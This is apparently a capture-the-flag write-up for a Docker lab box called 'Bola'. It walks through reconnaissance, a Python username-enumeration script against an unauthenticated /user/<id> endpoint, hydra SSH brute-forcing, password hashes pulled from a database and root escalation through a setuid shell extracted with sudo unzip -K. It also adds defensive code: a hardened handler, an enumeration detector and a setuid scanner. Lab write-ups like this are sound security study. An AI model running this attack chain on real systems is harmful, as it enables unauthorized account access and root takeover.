Bola

Let's download and start the Docker container.
Reconnaissance
┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap -sV -A 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-07-14 14:04 +08
Nmap scan report for 172.17.0.2
Host is up (0.0000070s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 4f:3f:8c:fb:88:da:ea:37:d6:9f:c3:bd:f4:8e:18:1b (ECDSA)
|_ 256 2e:a1:36:ff:8b:bb:0d:b3:c8:cb:4a:81:cb:37:77:31 (ED25519)
12345/tcp open http Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Site doesn't have a title (application/json).
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.01 ms 172.17.0.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds
We find two open ports: SSH on 22 and an HTTP service on 12345. Browsing to http://172.17.0.2:12345 showed me nothing, so I searched for hidden directories with dirsearch.
┌──(zwique㉿zwique)-[~/Downloads]
└─$ dirsearch -u http://172.17.0.2:12345/
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/zwique/Downloads/reports/http_172.17.0.2_12345/__25-07-14_14-07-06.txt
Target: http://172.17.0.2:12345/
[14:07:06] Starting:
[14:07:26] 400 - 167B - /console
[14:07:34] 405 - 153B - /login
[14:07:48] 308 - 245B - /user -> http://172.17.0.2:12345/user/
[14:07:48] 400 - 54B - /user/
[14:07:48] 200 - 73B - /user/3
[14:07:48] 200 - 69B - /user/1
[14:07:48] 200 - 65B - /user/2
Task Completed
Great, we've just found a JSON list of users at /user/<id>: the endpoint hands out any user's record to an unauthenticated request simply by changing the id, which is the Broken Object Level Authorization the box name refers to. So here is the idea for getting access.
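To make the defect concrete, here is an added example (my code, not the box's) of a /user/<id> lookup written the way this one behaves, beside a hardened version that authenticates the caller and checks that the requested object belongs to them. The user records, the session dict and the admin role are assumptions.

```python
import json

# Constructed sample records standing in for the app's user table; the real
# ids and names behind /user/1..3 are not shown on the page.
USERS = {
    1: {"username": "steven"},
    2: {"username": "alice"},
    3: {"username": "baluadmin"},
}

def user_vulnerable(user_id, session=None):
    """Mirrors the box: any caller, logged in or not, may read any id,
    so walking 1..N harvests every account (Broken Object Level Authorization)."""
    user = USERS.get(user_id)
    if user is None:
        return 404, json.dumps({"error": "not found"})
    return 200, json.dumps({"id": user_id, **user})

def user_hardened(user_id, session):
    """Authenticate first, then authorise on the object itself: a caller may
    read only their own record unless their session carries the admin role."""
    if not session or "uid" not in session:
        return 401, json.dumps({"error": "authentication required"})
    owner = session["uid"] == user_id
    admin = session.get("role") == "admin"
    user = USERS.get(user_id)
    if user is None or not (owner or admin):
        # One response for "missing" and "not yours": a 403/404 split would
        # still let a caller map which ids exist.
        return 404, json.dumps({"error": "not found"})
    return 200, json.dumps({"id": user_id, **user})

def harvestable_ids(handler, session, max_id=5):
    """Ids a caller can read by walking the id space, as the script in the
    Exploit section does; the hardened handler gives a non-admin only their own."""
    return [i for i in range(1, max_id + 1) if handler(i, session)[0] == 200]
```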
Exploit
Take every username listed in the JSON responses.
Brute-force their passwords on the SSH port using hydra.
Here is the Python script that collects the list of usernames.
import requests

base_url = "http://172.17.0.2:12345/user/"
timeout_ids = 10   # stop after this many consecutive ids with no user
current_id = 1
failures = 0

with open("users.txt", "w") as f:
    while failures < timeout_ids:
        url = f"{base_url}{current_id}"
        response = requests.get(url)
        if response.status_code == 200:
            try:
                data = response.json()
                username = data.get("username")
                if username:
                    print(f"[{current_id}] username: {username}")
                    f.write(username + "\n")
                    failures = 0  # a hit resets the miss counter
                else:
                    print(f"[{current_id}] No username in response.")
                    failures += 1
            except Exception as e:
                print(f"[{current_id}] Invalid JSON: {e}")
                failures += 1
        else:
            print(f"[{current_id}] No user (status {response.status_code})")
            failures += 1
        current_id += 1
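From the defending side, the same id walk is easy to spot in the server's access log. The following added example (not from the write-up) flags any source that hits five or more distinct /user/<id> ids within a minute, run over constructed lines in the format Werkzeug's development server prints; the window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Werkzeug dev-server access-log line: ip - - [date time] "METHOD path proto" status -
LINE_RE = re.compile(r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
USER_RE = re.compile(r"^/user/(\d+)$")

def parse(line):
    """Return (ip, timestamp, path, status) or None for a non-matching line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y %H:%M:%S"), m["path"], int(m["status"])

def find_enumeration(lines, window_s=60, min_ids=5):
    """Per source IP, count distinct /user/<id> ids hit inside any window_s-second
    span and report sources reaching min_ids. 404s count too: probing ids that do
    not exist is part of the signal, and the script above keeps going through them."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, path, _ = rec
        um = USER_RE.match(path)
        if um:
            per_ip[ip].append((ts, int(um.group(1))))
    alerts = {}
    for ip, hits in per_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ids = {uid for ts, uid in hits[i:] if (ts - start).total_seconds() <= window_s}
            if len(ids) >= min_ids:
                alerts[ip] = sorted(ids)
                break
    return alerts

# Constructed sample lines (not captured from the box) in the same format.
SAMPLE_LOG = """\
172.17.0.1 - - [14/Jul/2025 14:07:48] "GET /user/1 HTTP/1.1" 200 -
172.17.0.1 - - [14/Jul/2025 14:07:48] "GET /user/2 HTTP/1.1" 200 -
172.17.0.1 - - [14/Jul/2025 14:07:48] "GET /user/3 HTTP/1.1" 200 -
172.17.0.1 - - [14/Jul/2025 14:07:49] "GET /user/4 HTTP/1.1" 404 -
172.17.0.1 - - [14/Jul/2025 14:07:49] "GET /user/5 HTTP/1.1" 404 -
172.17.0.9 - - [14/Jul/2025 14:10:02] "GET /user/2 HTTP/1.1" 200 -
172.17.0.9 - - [14/Jul/2025 14:30:05] "GET /login HTTP/1.1" 405 -
""".splitlines()
```

`find_enumeration(SAMPLE_LOG)` reports only 172.17.0.1; the second source reads a single id and is left alone.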
hydra -L users.txt ssh://172.17.0.2 -P /usr/share/wordlists/rockyou.txt
[22][ssh] host: 172.17.0.2 login: steven password: steven
Log in as steven over SSH (steven@172.17.0.2).
Then I ran linpeas.sh to look for anything useful, and it turned out that the .bash_history file contained valid credentials.
steven@7460f532dd7d:~$ cat .bash_history
mysql -y steven -psteven
mysql -u steven -psteven
exit
mysql -u steven -psteven
exit
ls
unzip secretitosecretazo.zip
ls
cp secretitosecretazo.zip /home
ls
exit
sudo -l
cd /home
ls
exit
mysql -u steven -psteven
SHOW DATABASES;
USE secretito;
SELECT * FROM secretito;
MariaDB [secretito]> SELECT * FROM usuarios;
+----+-----------+----------------------------------+
| id | usuario | password |
+----+-----------+----------------------------------+
| 1 | alice | 8bdffaa69d328c1d4ae3aeadc97de223 |
| 2 | bob | d8578edf8458ce06fbc5bb76a58c5ca4 |
| 3 | charlie | e99a18c428cb38d5f260853678922e03 |
| 4 | baluadmin | aa87ddc5b4c24406d26ddad771ef44b0 |
| 5 | diana | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
5 rows in set (0.002 sec)
Very well! We've just found the users' MD5-hashed passwords. Crack the hashes using john/hashcat or even CrackStation.
The username that stands out is baluadmin; cracking its hash gives baluadmin:estrella.
After logging in as baluadmin, I checked which sudo commands I'm allowed to run without a password.
baluadmin@7460f532dd7d:~$ sudo -l
Matching Defaults entries for baluadmin on 7460f532dd7d:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
use_pty
User baluadmin may run the following commands on 7460f532dd7d:
(ALL) NOPASSWD: /usr/bin/unzip
Root
baluadmin@1f62a5cad7a9:~$ cp /bin/sh .
baluadmin@1f62a5cad7a9:~$ chmod +s sh
baluadmin@1f62a5cad7a9:~$ zip shell.zip sh
adding: sh (deflated 52%)
baluadmin@1f62a5cad7a9:~$ sudo unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: sh
baluadmin@1f62a5cad7a9:~$ ./sh -p
id
uid=1001(baluadmin) gid=1001(baluadmin) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluadmin)
#
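A quick host-side check for this class of escalation, added here and not part of the write-up: list setuid/setgid executables under directories where no packaged binary belongs (the paths in the main block are assumptions). A root-owned setuid sh sitting in a home directory, as planted above, is exactly what it is meant to catch.

```python
import os
import stat

def is_setid_executable(mode):
    """True for a regular file carrying setuid or setgid plus any execute bit."""
    if not stat.S_ISREG(mode):
        return False
    setid = mode & (stat.S_ISUID | stat.S_ISGID)
    execute = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return bool(setid and execute)

def find_setid_files(roots):
    """Walk each root without following symlinks and return (path, owner uid,
    mode string) for every setid executable. A root-owned (uid 0) hit under
    /home or /tmp has the shape of the planted sh above and deserves a look."""
    findings = []
    for root in roots:
        for dirpath, _dirs, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: a symlink is reported as a link, not its target
                except OSError:
                    continue
                if is_setid_executable(st.st_mode):
                    findings.append((path, st.st_uid, stat.filemode(st.st_mode)))
    return findings

if __name__ == "__main__":
    # Assumed scan roots; adjust to the directories users can write to on the host.
    for path, uid, mode in find_setid_files(["/home", "/tmp"]):
        print(mode, uid, path)
```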
This works because sudo runs unzip as root, so the extracted sh is created root-owned, and -K tells unzip to keep the setuid bit it would otherwise strip; sh -p then keeps the effective uid instead of dropping it. A NOPASSWD rule on an archive extractor is therefore as good as a root shell. GG. Since I was curious what was inside secretitosecretazo.zip, I extracted it as root.
cd /
ls
bin etc lib64 opt rootshell.sh secretitosecretazo.zip tmp
boot home media proc run srv usr
dev lib mnt root sbin sys var
unzip secretitosecretazo.zip
Archive: secretitosecretazo.zip
extracting: sorpresitajiji.txt
cat sorpresitajiji.txt
root:pedazodepasswordchaval
#